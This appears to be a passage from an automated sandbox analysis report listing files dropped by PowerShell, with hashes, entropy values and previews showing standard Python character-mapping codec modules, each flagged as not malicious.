                                                                                                                                                                                                              SHA-256:4622BB45469E23C852698A6B784B5E28AFD8072FDDB8E319C02D39B138CB9DBE
                                                                                                                                                                                                              SHA-512:CCCA6974D74B32643D84198A626C28A6CC777B3D9853C90FDE3F61D54F8A41ED3C423CE2795402E6157A1529985C91E56B1D2C944EF3222E54CA8D2A232C0D6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-5',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11140
                                                                                                                                                                                                              Entropy (8bit):4.629970059245577
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:+HhsuOTDvRhUrXPLouhIAs2+ijLeCdxeiu5iEp30yfZn:LTnuhIAlUH
                                                                                                                                                                                                              MD5:A69D78A4C1AB4134DC5033FA45821AAE
                                                                                                                                                                                                              SHA1:C0B9008772067BF43B1A817780D6B86DFCD87EF8
                                                                                                                                                                                                              SHA-256:1543F9AD8DCC4AA912C5C901A5A216A4EA3DB62FB19197A0D90CCC0EE69B4538
                                                                                                                                                                                                              SHA-512:230E26A9366387FAE38340921C675D3AD3CD8580096824842FA9261EB1BBA391E399525425030854FAA9F84819E57F7F9F238426B809274A6D78676143AC9F3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-6',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13151
                                                                                                                                                                                                              Entropy (8bit):4.649031466938632
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:+HhsuOTDvReUrXPLouhIAs2+ijLEARfO21XHHjfvK8uHZh:LTEuhIAl8AN11XO8Aj
                                                                                                                                                                                                              MD5:50BFFF8D67F78DF6B9941AD829159358
                                                                                                                                                                                                              SHA1:D766C9E1E2EA76FB3CA67793F36A3F45C1545132
                                                                                                                                                                                                              SHA-256:41FEB2BEC72E3F07C0D67F0E421FF8E51A8E1688AA20AF7C8A12CE0DDF464104
                                                                                                                                                                                                              SHA-512:00EEA3F1B69FA47E0DA4B7AC0E4AD0E8830A6A3E845B3D340A4ACB4DB0838D01423B4FFAD94863178ECAD72FA1053868CE506C5AF3C010C76A29D11F2BB992C5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_7 generated from 'MAPPINGS/ISO8859/8859-7.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-7',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11343
                                                                                                                                                                                                              Entropy (8bit):4.621650787612196
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aHhsuOTDvR7UrXPLouhIAs2+ijLUSj6ZZPHxvi:3TluhIAlcSv
                                                                                                                                                                                                              MD5:E873B80A7B474B64BA463354A5D1A39A
                                                                                                                                                                                                              SHA1:58682E0EF443927AC206F8C0B70FB2636DD1C2C2
                                                                                                                                                                                                              SHA-256:63D11B2592BDB036C8F4150EC1F968D1A6E01D22AF8D7DAF94F6C72E0A8FD752
                                                                                                                                                                                                              SHA-512:185EA3AD52F3CE519171B5CBBB5BF7071C009A800121F368CD06118F1A82D37BA2A5526118D6A8B1117C5C9AD31699BD657903CDA9C4A25D6BB7D192C643C717
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_8 generated from 'MAPPINGS/ISO8859/8859-8.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-8',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13463
                                                                                                                                                                                                              Entropy (8bit):4.569353880954753
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:KHhsuOTDvRIUrXPLouhIAs2+ijLMZt6B5TdjN:nTiuhIAlEZt69x
                                                                                                                                                                                                              MD5:CAD4BC52AF4F5E24614AC8857D21DC35
                                                                                                                                                                                                              SHA1:49BDA77039C166194660CAF30885E17951603F3E
                                                                                                                                                                                                              SHA-256:FD0CCFDE95FCFEBF48BA5ED5F697C4799C3303B853077F48FFEF2FD9EF1E30C8
                                                                                                                                                                                                              SHA-512:6CBDC2C1F97DB4A9A1BFD1D1601C55F946C82BB5AE2844DDECC98A1B760B7EB292EA393DFD2A1D45BA99906397861BF01E1C0C3430D8285B517724F06F19D10E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-9',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                              Entropy (8bit):4.530496029691674
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nNqxOzSf/XokTZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj92FcJxFpz:Nqyzqt62VJjRU8njOxLnrxLbrLK8+Jx/
                                                                                                                                                                                                              MD5:161F7EEDD0B4169D0A36DA2E7808EB7B
                                                                                                                                                                                                              SHA1:35D8869963DBB870A4B9DF3C974DE9A5CF5F4E41
                                                                                                                                                                                                              SHA-256:C83AA2098AB15FBAD7EB999C303B27350B0459EE9F6FC2B2BF4004D4285F9E8D
                                                                                                                                                                                                              SHA-512:5219805C9AF0799449BA650FE4108B450A20A3864AC5CD7ADA83A5C2429F9604025E8F1F296A461600E73372779838971AB91F150060761597D670B4AB9ED531
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# johab.py: Python Unicode Codec for JOHAB..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('johab')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='johab',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14086
                                                                                                                                                                                                              Entropy (8bit):4.696171438355166
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:veHhsuOTDvRnUrXPLouhIAs2+i4bur6Zv8muyEdP:vrT5uhIAl/euxP
                                                                                                                                                                                                              MD5:75872A24381833D8B71D42A66523AA45
                                                                                                                                                                                                              SHA1:C4AC11C4903178821FE680C732462C02626C016B
                                                                                                                                                                                                              SHA-256:90A883B291D5F1E6DBB735413D51648C31580B1927500161C16624836D01E5EE
                                                                                                                                                                                                              SHA-512:A84BD3BDBC4BCBFE90B550CB4FFB6CDBEBBB4B1C3824A931CBA448E84C79D4D6B05D9D67C0718FA97F790B8C1071C775010058306BCEC2769D4E721808CED8FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-r',.. encode=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13501
                                                                                                                                                                                                              Entropy (8bit):4.664370116157909
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ahsuOTDvRNUrXPLouhIAs2+imIzDCYPfuyEdP:fTLuhIAl5jfuxP
                                                                                                                                                                                                              MD5:B2F96B9A1CF37B7C81BE8704D4E62EF9
                                                                                                                                                                                                              SHA1:AB37BF387BF19A833126952D139E41093DD217D9
                                                                                                                                                                                                              SHA-256:86D922A935AFDE1BD7C22CF8A9F23A237511C92C51509A80051DD2862A84D09F
                                                                                                                                                                                                              SHA-512:F139A2AAB199BB95905B6C020A6410D9FC1C67486BB8AF7796CE41BCC8CDE7AE034749F50728162BE836AE2D4ED74D4ED82282EE56517843C404412C72756ECE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec koi8_t.."""..# http://ru.wikipedia.org/wiki/...-8..# http://www.opensource.apple.com/source/libiconv/libiconv-4/libiconv/tests/KOI8-T.TXT....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14069
                                                                                                                                                                                                              Entropy (8bit):4.689466302139651
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:SHhsuOTDvR6UrXPLouhIAs2+i4bur6e9zuyEdP:fTIuhIAl/5uxP
                                                                                                                                                                                                              MD5:211B71B4C717939EDEDBFD33A9C726BE
                                                                                                                                                                                                              SHA1:64DEB95FD1A59EC03B09643BE2F2055A079151E4
                                                                                                                                                                                                              SHA-256:9F77F72F8A42A1BA97C7D53AFDB6F6A6D4E08707CAA4D4CD57D6C113156BB32B
                                                                                                                                                                                                              SHA-512:3CBACB39A0994C5285E5B0316B3816916D43C6EE607398022B7BF05430A9621416C2F28A848C2E90B47BE147DDFFB7CF03D5CE8C129BFE52247D6AA238FF5639
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec koi8_u generated from 'python-mappings/KOI8-U.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-u',.. encode=Codec(
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14030
                                                                                                                                                                                                              Entropy (8bit):4.572243714560591
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Mn/GuINDBTXqJPnXEeXGyQCmEYcrj6CbwK+avSMcdgF:LNneXGy1lHwK+avSMNF
                                                                                                                                                                                                              MD5:F4729A1242BD140B732D4BEE6E137558
                                                                                                                                                                                                              SHA1:44EFA222BB2CA9ADD776C29A098F9F03FF03E515
                                                                                                                                                                                                              SHA-256:DA8BAC477F14620D8AA89EB6CB8963602E1C39724148369C88EF48C95D495011
                                                                                                                                                                                                              SHA-512:F5812E38B06620752A557FA70F207AA3298A2FEC7598107BCE749F5B1529A8CA92CAC5AD72E068F6F711C714868389861E93B25B484FA2AD13FC8B3A50EE797E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec kz1048 generated from 'MAPPINGS/VENDORS/MISC/KZ1048.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self, input, errors='strict'):.. return codecs.charmap_encode(input, errors, encoding_table).... def decode(self, input, errors='strict'):.. return codecs.charmap_decode(input, errors, decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input, self.errors, decoding_table)[0]....class StreamWriter(Codec, codecs.StreamWriter):.. pass....class StreamReader(Codec, codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='kz1048',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1314
                                                                                                                                                                                                              Entropy (8bit):4.724793488479122
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:J4OSEHV0yWJyWKMufQ2hQZUQWSJzWSJDtyWVyWg9ZKj9b1QJxFplR:J4OSJui6SJ6SJ8TKnQJxTz
                                                                                                                                                                                                              MD5:92C4D5E13FE5ABECE119AA4D0C4BE6C5
                                                                                                                                                                                                              SHA1:79E464E63E3F1728EFE318688FE2052811801E23
                                                                                                                                                                                                              SHA-256:6D5A6C46FE6675543EA3D04D9B27CCCE8E04D6DFEB376691381B62D806A5D016
                                                                                                                                                                                                              SHA-512:C95F5344128993E9E6C2BF590CE7F2CFFA9F3C384400A44C0BC3ACA71D666ED182C040EC495EA3AF83ABBD9053C705334E5F4C3F7C07F65E7031E95FDFB7A561
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'latin-1' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.latin_1_encode.. decode = codecs.latin_1_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.latin_1_encode(input,self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.latin_1_decode(input,self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.latin_1_decode.. decode = codecs.latin_1_encode....### encodings module API..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):37165
                                                                                                                                                                                                              Entropy (8bit):4.736863402692657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:RakostECDXJVf+hiOjiU6Q3DBEQ12yWQZr75CAwKC1/h:Ukost5LX2htjN6QT682PQx5PwVJ
                                                                                                                                                                                                              MD5:C269925332C46C7A774FBFCAD74F4B66
                                                                                                                                                                                                              SHA1:5F9542A16C83A7EE831F320507BD87756B398DCF
                                                                                                                                                                                                              SHA-256:F5C262F930F3B7D83466283347F8B0D7B5C7CBF18DD6FCEB4FAF93DBCD58839E
                                                                                                                                                                                                              SHA-512:5BAE57045F650E062EAEA05106F726A0C9B29409CA6CD9667338473DF8CA779BE8965C5F8BD5D87B2DDB76024794AFFC92FF98850D0D0161269133AC3B2F7825
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/APPLE/ARABIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-arabic',.. encode=Codec().encode,
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13940
                                                                                                                                                                                                              Entropy (8bit):4.577897629122807
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wHhsuOTDvRI7ZpouhIAs2+iy2w4kN8gzeqBwHr+:tTZuhIAl+4E16ap
                                                                                                                                                                                                              MD5:C3FC8C5389BFDF1371B849C38FE1A20C
                                                                                                                                                                                                              SHA1:009654FD007C938E2FC889B64954FD139EE051E8
                                                                                                                                                                                                              SHA-256:68539CA54FFD5D96C07F3590E720D8A28009CB7CAA13E607AC3084D19DD5A19A
                                                                                                                                                                                                              SHA-512:8F81FD2106ED43E0CE34004576ED99D77FB6766EC6B757EB4F8B815742E86F90C36CDBAF19E9C3BE3D4F2B92B94695D014721C4A2D7E22312155BE7FBA1164BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_croatian generated from 'MAPPINGS/VENDORS/APPLE/CROATIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-croatian',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13761
                                                                                                                                                                                                              Entropy (8bit):4.613646718299373
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8HhsuOTDvRA7ZpouhIAs2+i4Xm8jLPeqBap+f:pTduhIAl+mmia1f
                                                                                                                                                                                                              MD5:69AF178D83304D0AB6260D64CC9C734F
                                                                                                                                                                                                              SHA1:AA73ADF92F5762F559B26C9858590AA750D4F25F
                                                                                                                                                                                                              SHA-256:AC11E1F54789AFF782D79FE7D6FD52183EF0F57B6AC4A0F680353FE0113F0D4D
                                                                                                                                                                                                              SHA-512:A42B7C7CD5E6AE157B1DCE131264C353DF0FF6FEA09B06D1498EF07931D94D91C48D311964E0F35D4DF893CE65BFD5F3339BB9E1541DFBE2A2FEED25A478E9F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-cyrillic',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15477
                                                                                                                                                                                                              Entropy (8bit):4.803106966743048
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:4HhsuOTDvRe7Zt+/UxcXwz1BhFouhCuMQ+iujx5zCdxeiu5iEpkHzWO0yfZBcsWR:FTPuhCuj6fHmHzp03
                                                                                                                                                                                                              MD5:46E0758A4DF808F2649BD6B7262362BA
                                                                                                                                                                                                              SHA1:A647995DAE668E9D2EDF34529CF1DDDD06AC8016
                                                                                                                                                                                                              SHA-256:B0F1FA8399AD1844EF5F07ACFCD523585AB576F411D845A008A610FF6A25AD31
                                                                                                                                                                                                              SHA-512:ABB217D00013E01B89855773B9CA728F2F0D14C9E3A7F4CC705588D458CB06E93A6FC187F87FD084F78E0668094324F9D0857D58CFC68D04A8883C8973BB6A77
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-farsi',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14028
                                                                                                                                                                                                              Entropy (8bit):4.6264619578502515
